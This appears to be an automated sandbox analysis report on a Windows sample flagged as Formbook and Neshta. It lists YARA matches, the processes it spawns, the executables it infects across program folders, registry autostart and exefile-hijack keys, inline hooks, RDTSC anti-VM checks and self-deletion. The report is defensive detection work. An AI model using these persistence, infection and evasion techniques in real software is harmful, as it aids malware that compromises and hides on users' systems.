          Source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.svchost.com.400000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_Neshta_Generic, date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_Neshta_Generic, date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: classification engine, Classification label: mal100.spre.troj.evad.winEXE@15/122@1/1
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe, Code function: 2_2_004041CD GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,2_2_004041CD
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe, Code function: 2_2_00402020 CoCreateInstance,MultiByteToWideChar,2_2_00402020
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe, File created: C:\Users\user\AppData\Roaming\hbqilrp
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_01
          Source: C:\Windows\svchost.com, Mutant created: \Sessions\1\BaseNamedObjects\MutexPolesskayaGlush*.* svchost.com n X . t N t h ` T 5 @
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe, File created: C:\Users\user\AppData\Local\Temp\3582-490
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe, File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
          Source: vi0EwpbUht.exe, Metadefender: Detection: 91%
          Source: vi0EwpbUht.exe, ReversingLabs: Detection: 100%
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe, File read: C:\Users\user\Desktop\vi0EwpbUht.exe
          Source: unknown, Process created: C:\Users\user\Desktop\vi0EwpbUht.exe 'C:\Users\user\Desktop\vi0EwpbUht.exe'
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe, Process created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe, Process created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Windows\explorer.exe, Process created: C:\Windows\svchost.com 'C:\Windows\svchost.com' 'C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe'
          Source: C:\Windows\svchost.com, Process created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe, Process created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
          Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: netstat.pdbGCTL source: vi0EwpbUht.exe, 00000003.00000002.480933192.0000000002A20000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.439100550.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: vi0EwpbUht.exe, 00000003.00000002.480933192.0000000002A20000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: vi0EwpbUht.exe, 00000002.00000003.327241678.0000000003140000.00000004.00000001.sdmp, vi0EwpbUht.exe, 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, elxhan.exe, 00000007.00000002.565127229.0000000000B0F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vi0EwpbUht.exe, elxhan.exe, NETSTAT.EXE, help.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.439100550.0000000007CA0000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe, Unpacked PE file: 3.2.vi0EwpbUht.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe, Unpacked PE file: 7.2.elxhan.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe, Code function: 2_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,2_2_00405CFF

          Persistence and Installation Behavior:

          Yara detected Neshta
          Source: Yara match, File source: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: vi0EwpbUht.exe PID: 7096, type: MEMORY
          Source: Yara match, File source: 1.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
          Drops PE files with a suspicious file extension
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe, File created: C:\Windows\svchost.com
          Drops executable to a common third party application directory
          Drops executables to the windows directory (C:\Windows) and starts them
          Source: C:\Windows\explorer.exe, Executable created and started: C:\Windows\svchost.com
          Infects executable files (exe, dll, sys, html)
          Sample is not signed and drops a device driver
          Source: C:\Windows\svchost.com, File created: C:\Windows\directx.sys
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeFile created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to dropped file

          Boot Survival:

          Yara detected Neshta
          Source: Yara match, File source: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: vi0EwpbUht.exe PID: 7096, type: MEMORY
          Source: Yara match, File source: 1.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
          Creates an undocumented autostart registry key
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe, Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULL
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe, Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run gmsauh

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe, User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEB
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe, Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe, Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe, Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\svchost.com, Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe, Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe, RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe, RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe, RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe, RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, RDTSC instruction interceptor: First address: 00000000023598E4 second address: 00000000023598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, RDTSC instruction interceptor: First address: 0000000002359B4E second address: 0000000002359B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exe, RDTSC instruction interceptor: First address: 0000000000E798E4 second address: 0000000000E798EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exe, RDTSC instruction interceptor: First address: 0000000000E79B4E second address: 0000000000E79B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe, File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe, Code function: 3_2_00409A80 rdtsc 3_2_00409A80
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to dropped file
